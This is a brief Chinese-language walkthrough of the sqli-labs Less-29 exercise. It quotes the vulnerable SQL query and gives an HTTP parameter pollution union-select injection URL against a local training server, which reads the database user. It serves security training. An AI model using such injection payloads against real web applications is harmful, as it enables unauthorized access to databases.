Less-29
首先先看下tomcat中的index.jsp文件
在apache的index.php中,sql语句为
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
因此我们根据HPP的原理,我们直接payload:
http://127.0.0.1:8080/sqli-labs/Less-29/index.jsp?id=1&id=-2%27union%20select%201,user(),3--+
至于如何注入到其他的内容,只需要自己构造union后面的sql语句即可。